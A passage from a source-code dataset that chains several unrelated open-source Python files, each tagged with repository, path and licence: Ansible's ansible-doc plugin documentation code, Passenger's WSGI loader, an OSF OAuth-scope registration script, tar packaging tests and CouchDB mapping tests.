self.plugin_list.update(self.find_plugins(path, plugin_type))
list_text = self.get_plugin_list_filenames(loader)
self.pager(list_text)
return 0
# list plugins for type
if self.options.list_dir:
paths = loader._get_paths()
for path in paths:
self.plugin_list.update(self.find_plugins(path, plugin_type))
self.pager(self.get_plugin_list_text(loader))
return 0
# process all plugins of type
if self.options.all_plugins:
self.args = self.get_all_plugins_of_type(plugin_type, loader)
# dump plugin metadata as JSON
if self.options.json_dump:
plugin_data = {}
for plugin_type in C.DOCUMENTABLE_PLUGINS:
plugin_data[plugin_type] = dict()
plugin_names = self.get_all_plugins_of_type(plugin_type)
for plugin_name in plugin_names:
plugin_info = self.get_plugin_metadata(plugin_type, plugin_name)
if plugin_info is not None:
plugin_data[plugin_type][plugin_name] = plugin_info
self.pager(json.dumps(plugin_data, sort_keys=True, indent=4))
return 0
if len(self.args) == 0:
raise AnsibleOptionsError("Incorrect options passed")
# process command line list
text = ''
for plugin in self.args:
textret = self.format_plugin_doc(plugin, loader, plugin_type, search_paths)
if textret:
text += textret
if text:
self.pager(text)
return 0
def get_all_plugins_of_type(self, plugin_type):
loader = getattr(plugin_loader, '%s_loader' % plugin_type)
plugin_list = set()
paths = loader._get_paths()
for path in paths:
plugins_to_add = self.find_plugins(path, plugin_type)
plugin_list.update(plugins_to_add)
return sorted(set(plugin_list))
def get_plugin_metadata(self, plugin_type, plugin_name):
# if the plugin lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
loader = getattr(plugin_loader, '%s_loader' % plugin_type)
filename = loader.find_plugin(plugin_name, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
raise AnsibleError("unable to load {0} plugin named {1} ".format(plugin_type, plugin_name))
try:
doc, __, __, metadata = get_docstring(filename, fragment_loader, verbose=(self.options.verbosity > 0))
except Exception:
display.vvv(traceback.format_exc())
raise AnsibleError(
"%s %s at %s has a documentation error formatting or is missing documentation." %
(plugin_type, plugin_name, filename))
if doc is None:
if 'removed' not in metadata.get('status', []):
raise AnsibleError(
"%s %s at %s has a documentation error formatting or is missing documentation." %
(plugin_type, plugin_name, filename))
# Removed plugins don't have any documentation
return None
return dict(
name=plugin_name,
namespace=self.namespace_from_plugin_filepath(filename, plugin_name, loader.package_path),
description=doc.get('short_description', "UNKNOWN"),
version_added=doc.get('version_added', "UNKNOWN")
)
def namespace_from_plugin_filepath(self, filepath, plugin_name, basedir):
if not basedir.endswith('/'):
basedir += '/'
rel_path = filepath.replace(basedir, '')
extension_free = os.path.splitext(rel_path)[0]
namespace_only = extension_free.rsplit(plugin_name, 1)[0].strip('/_')
clean_ns = namespace_only.replace('/', '.')
if clean_ns == '':
clean_ns = None
return clean_ns
def format_plugin_doc(self, plugin, loader, plugin_type, search_paths):
text = ''
try:
# if the plugin lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
filename = loader.find_plugin(plugin, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
display.warning("%s %s not found in:\n%s\n" % (plugin_type, plugin, search_paths))
return
if any(filename.endswith(x) for x in C.BLACKLIST_EXTS):
return
try:
doc, plainexamples, returndocs, metadata = get_docstring(filename, fragment_loader,
verbose=(self.options.verbosity > 0))
except Exception:
display.vvv(traceback.format_exc())
display.error(
"%s %s has a documentation error formatting or is missing documentation." % (plugin_type, plugin),
wrap_text=False)
return
if doc is not None:
# assign from other sections
doc['plainexamples'] = plainexamples
doc['returndocs'] = returndocs
doc['metadata'] = metadata
# generate extra data
if plugin_type == 'module':
# is there corresponding action plugin?
if plugin in action_loader:
doc['action'] = True
else:
doc['action'] = False
doc['filename'] = filename
doc['now_date'] = datetime.date.today().strftime('%Y-%m-%d')
if 'docuri' in doc:
doc['docuri'] = doc[plugin_type].replace('_', '-')
if self.options.show_snippet and plugin_type == 'module':
text += self.get_snippet_text(doc)
else:
text += self.get_man_text(doc)
return text
else:
if 'removed' in metadata.get('status', []):
display.warning("%s %s has been removed\n" % (plugin_type, plugin))
return
# this typically means we couldn't even parse the docstring, not just that the YAML is busted,
# probably a quoting issue.
raise AnsibleError("Parsing produced an empty object.")
except Exception as e:
display.vvv(traceback.format_exc())
raise AnsibleError(
"%s %s missing documentation (or could not parse documentation): %s\n" % (plugin_type, plugin, str(e)))
def find_plugins(self, path, ptype):
display.vvvv("Searching %s for plugins" % path)
plugin_list = set()
if not os.path.exists(path):
display.vvvv("%s does not exist" % path)
return plugin_list
bkey = ptype.upper()
for plugin in os.listdir(path):
display.vvvv("Found %s" % plugin)
full_path = '/'.join([path, plugin])
if plugin.startswith('.'):
continue
elif os.path.isdir(full_path):
continue
elif any(plugin.endswith(x) for x in C.BLACKLIST_EXTS):
continue
elif plugin.startswith('__'):
continue
elif plugin in C.IGNORE_FILES:
continue
elif plugin .startswith('_'):
if os.path.islink(full_path): # avoids aliases
continue
plugin = os.path.splitext(plugin)[0] # removes the extension
plugin = plugin.lstrip('_') # remove underscore from deprecated plugins
if plugin not in BLACKLIST.get(bkey, ()):
plugin_list.add(plugin)
display.vvvv("Added %s" % plugin)
return plugin_list
def get_plugin_list_text(self, loader):
columns = display.columns
displace = max(len(x) for x in self.plugin_list)
linelimit = columns - displace - 5
text = []
deprecated = []
for plugin in sorted(self.plugin_list):
try:
# if the module lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
filename = loader.find_plugin(plugin, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
continue
if filename.endswith(".ps1"):
continue
if os.path.isdir(filename):
continue
doc = None
try:
doc = read_docstub(filename)
except Exception:
display.warning("%s has a documentation formatting error" % plugin)
continue
if not doc or not isinstance(doc, dict):
with open(filename) as f:
metadata = extract_metadata(module_data=f.read())
if metadata[0]:
if 'removed' not in metadata[0].get('status', []):
display.warning("%s parsing did not produce documentation." % plugin)
else:
continue
desc = 'UNDOCUMENTED'
else:
desc = self.tty_ify(doc.get('short_description', 'INVALID SHORT DESCRIPTION').strip())
if len(desc) > linelimit:
desc = desc[:linelimit] + '...'
if plugin.startswith('_'): # Handle deprecated
deprecated.append("%-*s %-*.*s" % (displace, plugin[1:], linelimit, len(desc), desc))
else:
text.append("%-*s %-*.*s" % (displace, plugin, linelimit, len(desc), desc))
except Exception as e:
raise AnsibleError("Failed reading docs at %s: %s" % (plugin, to_native(e)), orig_exc=e)
if len(deprecated) > 0:
text.append("\nDEPRECATED:")
text.extend(deprecated)
return "\n".join(text)
def get_plugin_list_filenames(self, loader):
columns = display.columns
displace = max(len(x) for x in self.plugin_list)
linelimit = columns - displace - 5
text = []
for plugin in sorted(self.plugin_list):
try:
# if the module lives in a non-python file (eg, win_X.ps1), require the corresponding python file for docs
filename = loader.find_plugin(plugin, mod_type='.py', ignore_deprecated=True, check_aliases=True)
if filename is None:
continue
if filename.endswith(".ps1"):
continue
if os.path.isdir(filename):
continue
text.append("%-*s %-*.*s" % (displace, plugin, linelimit, len(filename), filename))
except Exception as e:
raise AnsibleError("Failed reading docs at %s: %s" % (plugin, to_native(e)), orig_exc=e)
return "\n".join(text)
@staticmethod
def print_paths(finder):
''' Returns a string suitable for printing of the search path '''
# Uses a list to get the order right
ret = []
for i in finder._get_paths(subdirs=False):
if i not in ret:
ret.append(i)
return os.pathsep.join(ret)
def get_snippet_text(self, doc):
text = []
desc = CLI.tty_ify(doc['short_description'])
text.append("- name: %s" % (desc))
text.append(" %s:" % (doc['module']))
pad = 31
subdent = " " * pad
limit = display.columns - pad
for o in sorted(doc['options'].keys()):
opt = doc['options'][o]
if isinstance(opt['description'], string_types):
desc = CLI.tty_ify(opt['description'])
else:
desc = CLI.tty_ify(" ".join(opt['description']))
required = opt.get('required', False)
if not isinstance(required, bool):
raise("Incorrect value for 'Required', a boolean is needed.: %s" % required)
if required:
desc = "(required) %s" % desc
o = '%s:' % o
text.append(" %-20s # %s" % (o, textwrap.fill(desc, limit, subsequent_indent=subdent)))
text.append('')
return "\n".join(text)
def _dump_yaml(self, struct, indent):
return CLI.tty_ify('\n'.join([indent + line for line in yaml.dump(struct, default_flow_style=False, Dumper=AnsibleDumper).split('\n')]))
def add_fields(self, text, fields, limit, opt_indent):
for o in sorted(fields):
opt = fields[o]
required = opt.pop('required', False)
if not isinstance(required, bool):
raise AnsibleError("Incorrect value for 'Required', a boolean is needed.: %s" % required)
if required:
opt_leadin = "="
else:
opt_leadin = "-"
text.append("%s %s" % (opt_leadin, o))
if isinstance(opt['description'], list):
for entry in opt['description']:
text.append(textwrap.fill(CLI.tty_ify(entry), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
else:
text.append(textwrap.fill(CLI.tty_ify(opt['description']), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
del opt['description']
aliases = ''
if 'aliases' in opt:
if len(opt['aliases']) > 0:
aliases = "(Aliases: " + ", ".join(str(i) for i in opt['aliases']) + ")"
del opt['aliases']
choices = ''
if 'choices' in opt:
if len(opt['choices']) > 0:
choices = "(Choices: " + ", ".join(str(i) for i in opt['choices']) + ")"
del opt['choices']
default = ''
if 'default' in opt or not required:
default = "[Default: %s" % str(opt.pop('default', '(null)')) + "]"
text.append(textwrap.fill(CLI.tty_ify(aliases + choices + default), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
if 'options' in opt:
text.append("%soptions:\n" % opt_indent)
self.add_fields(text, opt.pop('options'), limit, opt_indent + opt_indent)
if 'spec' in opt:
text.append("%sspec:\n" % opt_indent)
self.add_fields(text, opt.pop('spec'), limit, opt_indent + opt_indent)
conf = {}
for config in ('env', 'ini', 'yaml', 'vars', 'keywords'):
if config in opt and opt[config]:
conf[config] = opt.pop(config)
for ignore in self.IGNORE:
for item in conf[config]:
if ignore in item:
del item[ignore]
if conf:
text.append(self._dump_yaml({'set_via': conf}, opt_indent))
for k in sorted(opt):
if k.startswith('_'):
continue
if isinstance(opt[k], string_types):
text.append('%s%s: %s' % (opt_indent, k, textwrap.fill(CLI.tty_ify(opt[k]), limit - (len(k) + 2), subsequent_indent=opt_indent)))
elif isinstance(opt[k], (Sequence)) and all(isinstance(x, string_types) for x in opt[k]):
text.append(CLI.tty_ify('%s%s: %s' % (opt_indent, k, ', '.join(opt[k]))))
else:
text.append(self._dump_yaml({k: opt[k]}, opt_indent))
text.append('')
@staticmethod
def get_support_block(doc):
# Note: 'curated' is deprecated and not used in any of the modules we ship
support_level_msg = {'core': 'The Ansible Core Team',
'network': 'The Ansible Network Team',
'certified': 'an Ansible Partner',
'community': 'The Ansible Community',
'curated': 'A Third Party',
}
if doc['metadata'].get('metadata_version') in ('1.0', '1.1'):
return [" * This module is maintained by %s" % support_level_msg[doc['metadata']['supported_by']]]
return []
@staticmethod
def get_metadata_block(doc):
text = []
if doc['metadata'].get('metadata_version') in ('1.0', '1.1'):
text.append("METADATA:")
text.append('\tSUPPORT LEVEL: %s' % doc['metadata']['supported_by'])
for k in (m for m in doc['metadata'] if m not in ('version', 'metadata_version', 'supported_by')):
if isinstance(k, list):
text.append("\t%s: %s" % (k.capitalize(), ", ".join(doc['metadata'][k])))
else:
text.append("\t%s: %s" % (k.capitalize(), doc['metadata'][k]))
return text
return []
def get_man_text(self, doc):
self.IGNORE = self.IGNORE + (self.options.type,)
opt_indent = " "
text = []
pad = display.columns * 0.20
limit = max(display.columns - int(pad), 70)
text.append("> %s (%s)\n" % (doc.get(self.options.type, doc.get('plugin_type')).upper(), doc.pop('filename')))
if isinstance(doc['description'], list):
desc = " ".join(doc.pop('description'))
else:
desc = doc.pop('description')
text.append("%s\n" % textwrap.fill(CLI.tty_ify(desc), limit, initial_indent=opt_indent, subsequent_indent=opt_indent))
if 'deprecated' in doc and doc['deprecated'] is not None and len(doc['deprecated']) > 0:
text.append("DEPRECATED: \n")
if isinstance(doc['deprecated'], dict):
if 'version' in doc['deprecated'] and 'removed_in' not in doc['deprecated']:
doc['deprecated']['removed_in'] = doc['deprecated']['version']
text.append("\tReason: %(why)s\n\tWill be removed in: Ansible %(removed_in)s\n\tAlternatives: %(alternative)s" % doc.pop('deprecated'))
else:
text.append("%s" % doc.pop('deprecated'))
text.append("\n")
try:
support_block = self.get_support_block(doc)
if support_block:
text.extend(support_block)
except Exception:
pass # FIXME: not suported by plugins
if doc.pop('action', False):
text.append(" * note: %s\n" % "This module has a corresponding action plugin.")
if 'options' in doc and doc['options']:
text.append("OPTIONS (= is mandatory):\n")
self.add_fields(text, doc.pop('options'), limit, opt_indent)
text.append('')
if 'notes' in doc and doc['notes'] and len(doc['notes']) > 0:
text.append("NOTES:")
for note in doc['notes']:
text.append(textwrap.fill(CLI.tty_ify(note), limit - 6, initial_indent=opt_indent[:-2] + "* ", subsequent_indent=opt_indent))
text.append('')
del doc['notes']
if 'requirements' in doc and doc['requirements'] is not None and len(doc['requirements']) > 0:
req = ", ".join(doc.pop('requirements'))
text.append("REQUIREMENTS:%s\n" % textwrap.fill(CLI.tty_ify(req), limit - 16, initial_indent=" ", subsequent_indent=opt_indent))
# Generic handler
for k in sorted(doc):
if k in self.IGNORE or not doc[k]:
continue
if isinstance(doc[k], string_types):
text.append('%s: %s' % (k.upper(), textwrap.fill(CLI.tty_ify(doc[k]), limit - (len(k) + 2), subsequent_indent=opt_indent)))
elif isinstance(doc[k], (list, tuple)):
text.append('%s: %s' % (k.upper(), ', '.join(doc[k])))
else:
text.append(self._dump_yaml({k.upper(): doc[k]}, opt_indent))
del doc[k]
text.append('')
if 'plainexamples' in doc and doc['plainexamples'] is not None:
text.append("EXAMPLES:")
if isinstance(doc['plainexamples'], string_types):
text.append(doc.pop('plainexamples').strip())
else:
text.append(yaml.dump(doc.pop('plainexamples'), indent=2, default_flow_style=False))
text.append('')
if 'returndocs' in doc and doc['returndocs'] is not None:
text.append("RETURN VALUES:\n")
if isinstance(doc['returndocs'], string_types):
text.append(doc.pop('returndocs'))
else:
text.append(yaml.dump(doc.pop('returndocs'), indent=2, default_flow_style=False))
text.append('')
try:
metadata_block = self.get_metadata_block(doc)
if metadata_block:
text.extend(metadata_block)
text.append('')
except Exception:
pass # metadata is optional
return "\n".join(text)
|
trondhindenes/ansible
|
lib/ansible/cli/doc.py
|
Python
|
gpl-3.0
| 26,365
|
#!/usr/bin/env python
# Phusion Passenger - https://www.phusionpassenger.com/
# Copyright (c) 2010-2014 Phusion
#
# "Phusion Passenger" is a trademark of Hongli Lai & Ninh Bui.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys, os, re, imp, threading, signal, traceback, socket, select, struct, logging, errno
options = {}
def abort(message):
sys.stderr.write(message + "\n")
sys.exit(1)
def readline():
result = sys.stdin.readline()
if result == "":
raise EOFError
else:
return result
def handshake_and_read_startup_request():
global options
print("!> I have control 1.0")
if readline() != "You have control 1.0\n":
abort("Invalid initialization header")
line = readline()
while line != "\n":
result = re.split(': *', line.strip(), 2)
name = result[0]
value = result[1]
options[name] = value
line = readline()
def load_app():
return imp.load_source('passenger_wsgi', 'passenger_wsgi.py')
def create_server_socket():
global options
filename = options['generation_dir'] + '/backends/wsgi.' + str(os.getpid())
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
os.remove(filename)
except OSError:
pass
s.bind(filename)
s.listen(1000)
return (filename, s)
def install_signal_handlers():
def debug(sig, frame):
id2name = dict([(th.ident, th.name) for th in threading.enumerate()])
code = []
for thread_id, stack in sys._current_frames().items():
code.append("\n# Thread: %s(%d)" % (id2name.get(thread_id,""), thread_id))
for filename, lineno, name, line in traceback.extract_stack(stack):
code.append(' File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
code.append(" %s" % (line.strip()))
print("\n".join(code))
def debug_and_exit(sig, frame):
debug(sig, frame)
sys.exit(1)
# Unfortunately, there's no way to install a signal handler that prints
# the backtrace without interrupting the current system call. os.siginterrupt()
# doesn't seem to work properly either. That is why we only have a SIGABRT
# handler and no SIGQUIT handler.
signal.signal(signal.SIGABRT, debug_and_exit)
def advertise_sockets(socket_filename):
print("!> socket: main;unix:%s;session;1" % socket_filename)
print("!> ")
if sys.version_info[0] >= 3:
def reraise_exception(exc_info):
raise exc_info[0].with_traceback(exc_info[1], exc_info[2])
def bytes_to_str(b):
return b.decode()
def str_to_bytes(s):
return s.encode('latin-1')
else:
def reraise_exception(exc_info):
exec("raise exc_info[0], exc_info[1], exc_info[2]")
def bytes_to_str(b):
return b
def str_to_bytes(s):
return s
class RequestHandler:
def __init__(self, server_socket, owner_pipe, app):
self.server = server_socket
self.owner_pipe = owner_pipe
self.app = app
def main_loop(self):
done = False
try:
while not done:
client, address = self.accept_connection()
if not client:
done = True
break
socket_hijacked = False
try:
try:
env, input_stream = self.parse_request(client)
if env:
if env['REQUEST_METHOD'] == 'ping':
self.process_ping(env, input_stream, client)
else:
socket_hijacked = self.process_request(env, input_stream, client)
except KeyboardInterrupt:
done = True
except IOError:
e = sys.exc_info()[1]
if not getattr(e, 'passenger', False) or e.errno != errno.EPIPE:
logging.exception("WSGI application raised an I/O exception!")
except Exception:
logging.exception("WSGI application raised an exception!")
finally:
if not socket_hijacked:
try:
# Shutdown the socket like this just in case the app
# spawned a child process that keeps it open.
client.shutdown(socket.SHUT_WR)
except:
pass
try:
client.close()
except:
pass
except KeyboardInterrupt:
pass
def accept_connection(self):
result = select.select([self.owner_pipe, self.server.fileno()], [], [])[0]
if self.server.fileno() in result:
return self.server.accept()
else:
return (None, None)
def parse_request(self, client):
buf = b''
while len(buf) < 4:
tmp = client.recv(4 - len(buf))
if len(tmp) == 0:
return (None, None)
buf += tmp
header_size = struct.unpack('>I', buf)[0]
buf = b''
while len(buf) < header_size:
tmp = client.recv(header_size - len(buf))
if len(tmp) == 0:
return (None, None)
buf += tmp
headers = buf.split(b"\0")
headers.pop() # Remove trailing "\0"
env = {}
i = 0
while i < len(headers):
env[bytes_to_str(headers[i])] = bytes_to_str(headers[i + 1])
i += 2
return (env, client)
if hasattr(socket, '_fileobject'):
def wrap_input_socket(self, sock):
return socket._fileobject(sock, 'rb', 512)
else:
def wrap_input_socket(self, sock):
return socket.socket.makefile(sock, 'rb', 512)
def process_request(self, env, input_stream, output_stream):
# The WSGI speculation says that the input parameter object passed needs to
# implement a few file-like methods. This is the reason why we "wrap" the socket._socket
# into the _fileobject to solve this.
#
# Otherwise, the POST data won't be correctly retrieved by Django.
#
# See: http://www.python.org/dev/peps/pep-0333/#input-and-error-streams
env['wsgi.input'] = self.wrap_input_socket(input_stream)
env['wsgi.errors'] = sys.stderr
env['wsgi.version'] = (1, 0)
env['wsgi.multithread'] = False
env['wsgi.multiprocess'] = True
env['wsgi.run_once'] = False
if env.get('HTTPS','off') in ('on', '1', 'true', 'yes'):
env['wsgi.url_scheme'] = 'https'
else:
env['wsgi.url_scheme'] = 'http'
headers_set = []
headers_sent = []
def write(data):
try:
if not headers_set:
raise AssertionError("write() before start_response()")
elif not headers_sent:
# Before the first output, send the stored headers.
status, response_headers = headers_sent[:] = headers_set
output_stream.sendall(str_to_bytes('Status: %s\r\n' % status))
for header in response_headers:
output_stream.sendall(str_to_bytes('%s: %s\r\n' % header))
output_stream.sendall(b'\r\n')
output_stream.sendall(data)
except IOError:
# Mark this exception as coming from the Phusion Passenger
# socket and not some other socket.
e = sys.exc_info()[1]
setattr(e, 'passenger', True)
raise e
def start_response(status, response_headers, exc_info = None):
if exc_info:
try:
if headers_sent:
# Re-raise original exception if headers sent.
reraise_exception(exc_info)
finally:
# Avoid dangling circular ref.
exc_info = None
elif headers_set:
raise AssertionError("Headers already set!")
headers_set[:] = [status, response_headers]
return write
def hijack():
env['passenger.hijacked_socket'] = output_stream
return output_stream
env['passenger.hijack'] = hijack
result = self.app(env, start_response)
if 'passenger.hijacked_socket' in env:
# Socket connection hijacked. Don't do anything.
return True
try:
for data in result:
# Don't send headers until body appears.
if data:
write(data)
if not headers_sent:
# Send headers now if body was empty.
write(b'')
finally:
if hasattr(result, 'close'):
result.close()
return False
def process_ping(self, env, input_stream, output_stream):
output_stream.sendall(b"pong")
if __name__ == "__main__":
logging.basicConfig(
level = logging.WARNING,
format = "[ pid=%(process)d, time=%(asctime)s ]: %(message)s")
if hasattr(logging, 'captureWarnings'):
logging.captureWarnings(True)
handshake_and_read_startup_request()
app_module = load_app()
socket_filename, server_socket = create_server_socket()
install_signal_handlers()
handler = RequestHandler(server_socket, sys.stdin, app_module.application)
print("!> Ready")
advertise_sockets(socket_filename)
handler.main_loop()
|
gnoling/passenger
|
helper-scripts/wsgi-loader.py
|
Python
|
mit
| 8,988
|
from __future__ import unicode_literals
from django.test import TestCase
class HomepageViewTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_get_method(self):
pass
def test_post_method(self):
pass
def test_dispatch(self):
pass
|
ozknightwalker/testing_101
|
base/tests/test_views.py
|
Python
|
bsd-2-clause
| 321
|
"""
Register the list of OAuth2 scopes that can be requested by third parties. This populates the Mongo collection
referenced by CAS when responding to authorization grant requests.
The database class is minimal; the exact specification for what a scope contains lives in the
python module from which this collection is drawn.
"""
import sys
import logging
from modularodm import Q
from modularodm import storage
from modularodm.exceptions import NoResultsFound
from scripts import utils as script_utils
from framework.auth import oauth_scopes
from framework.mongo import set_up_storage
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.oauth.models import ApiOAuth2Scope
logger = logging.getLogger(__name__)
def get_or_create(name, description, save=True):
"""
Populate or update the database entry, as needed
:param name:
:param description:
:return:
"""
if name != name.lower():
raise ValueError('Scope names are case-sensitive, and should always be lower-case.')
try:
scope_obj = ApiOAuth2Scope.find_one(Q('name', 'eq', name))
except NoResultsFound:
scope_obj = ApiOAuth2Scope(name=name, description=description)
print "Created new database entry for: ", name
else:
scope_obj.description = description
print "Updating existing database entry for: ", name
if save is True:
scope_obj.save()
return scope_obj
def set_backend():
"""Ensure a storage backend is set up for this model"""
set_up_storage([ApiOAuth2Scope], storage.MongoStorage)
def do_populate():
"""
:param dict scope_dict: Given a dictionary of scope definitions, {name: scope_namedtuple}, load the
resulting data into a database collection
:return:
"""
scope_dict = oauth_scopes.public_scopes
# Clear the scope collection and populate w/ only public scopes,
# nothing references these objects other than CAS in name only.
ApiOAuth2Scope.remove()
for name, scope in scope_dict.iteritems():
# Update a scope if it exists, else populate
if scope.is_public is True:
get_or_create(name, scope.description, save=True)
else:
logger.info("{} is not a publicly advertised scope; did not load into database".format(name))
def main(dry=True):
init_app(set_backends=True, routes=False) # Sets the storage backends on all models
with TokuTransaction():
# Set storage backends for this model
set_backend()
do_populate()
if dry:
raise Exception('Abort Transaction - Dry Run')
if __name__ == '__main__':
dry = 'dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
main(dry=dry)
|
doublebits/osf.io
|
scripts/register_oauth_scopes.py
|
Python
|
apache-2.0
| 2,812
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
#
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tar_library_package."""
__author__ = 'sammccall@google.com (Sam McCall)'
from io import BytesIO
import os
import tarfile
import gflags as flags
from google.apputils import basetest
from googleapis.codegen.filesys import tar_library_package
FLAGS = flags.FLAGS
class TarLibraryPackageTest(basetest.TestCase):
_FILE_NAME = 'a_test'
_DISALLOWED_FILE_NAME = 'unicode_☃☄'
_FILE_CONTENTS = u'this is a test - ☃☄'
_TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), 'testdata')
def setUp(self):
self._output_stream = BytesIO()
self._package = tar_library_package.TarLibraryPackage(
self._output_stream)
def tearDown(self):
pass
def testAsciiFilenames(self):
self.assertRaises(UnicodeError, self._package.StartFile,
self._DISALLOWED_FILE_NAME)
def testBasicWriteFile(self):
stream = self._package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
self._package.EndFile()
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
self.assertEquals(len(self._FILE_CONTENTS.encode('utf-8')),
info_list[0].size)
def testBasicWriteFileUncompressed(self):
output_stream = BytesIO()
package = tar_library_package.TarLibraryPackage(
output_stream, compress=False)
stream = package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
package.EndFile()
package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(output_stream.getvalue()), mode='r')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
self.assertEquals(len(self._FILE_CONTENTS.encode('utf-8')),
info_list[0].size)
def testStartAutomaticallyClosesPreviousFile(self):
stream = self._package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
file_name_2 = '%s_2' % self._FILE_NAME
stream = self._package.StartFile(file_name_2)
stream.write(self._FILE_CONTENTS)
self._package.EndFile()
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(2, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
self.assertEquals(file_name_2, info_list[1].name)
def testDoneAutomaticallyEndsFile(self):
stream = self._package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
def testIncludeFile(self):
made_up_dir = 'new_directory/'
made_up_path = '%sfile1.txt' % made_up_dir
# testdata/file1.txt is 125 bytes long.
expected_size = 125
self._package.IncludeFile(os.path.join(self._TEST_DATA_DIR, 'file1.txt'),
made_up_path)
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list)) # no explicit folders
self.assertEquals(made_up_path, info_list[0].name)
self.assertEquals(expected_size, info_list[0].size)
def testManyFiles(self):
top_of_tree = os.path.join(self._TEST_DATA_DIR, 'tree/')
total_files_in_testdata_tree = 3 # determined by hand
paths = []
for root, unused_dirs, file_names in os.walk(top_of_tree):
for file_name in file_names:
paths.append(os.path.join(root, file_name))
self._package.IncludeManyFiles(paths, top_of_tree)
self._package.DoneWritingArchive()
# check it
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(total_files_in_testdata_tree, len(info_list))
def testManyFilesError(self):
files = [os.path.join(self._TEST_DATA_DIR, file_name)
for file_name in ['tree/abc', 'tree/def', 'file1.txt']]
self.assertRaises(ValueError,
self._package.IncludeManyFiles,
files,
os.path.join(self._TEST_DATA_DIR, 'tree/'))
def testFileProperties(self):
self.assertEquals('tgz', self._package.FileExtension())
self.assertEquals('application/x-gtar-compressed', self._package.MimeType())
uncompressed = tar_library_package.TarLibraryPackage(
BytesIO(), compress=False)
self.assertEquals('tar', uncompressed.FileExtension())
self.assertEquals('application/x-gtar', uncompressed.MimeType())
if __name__ == '__main__':
basetest.main()
|
google/apis-client-generator
|
src/googleapis/codegen/filesys/tar_library_package_test.py
|
Python
|
apache-2.0
| 5,992
|
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
from sql import *
from sql_dumper import *
from database_impl import *
from transaction import *
from transaction_log import *
from transaction_state import *
from exception_log import *
from search import *
from sobject_mapping import *
from sobject_config import *
from db_introspect import *
from sobject_log import *
from widget_db_config import *
from sobject_default_config import *
|
sadanandb/pmt
|
src/pyasm/search/__init__.py
|
Python
|
epl-1.0
| 730
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2009 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
from decimal import Decimal
import doctest
import unittest
from couchdb import design, mapping
from couchdb.tests import testutil
class DocumentTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_mutable_fields(self):
class Test(mapping.Document):
d = mapping.DictField()
a = Test()
b = Test()
a.d['x'] = True
self.assertTrue(a.d.get('x'))
self.assertFalse(b.d.get('x'))
def test_automatic_id(self):
class Post(mapping.Document):
title = mapping.TextField()
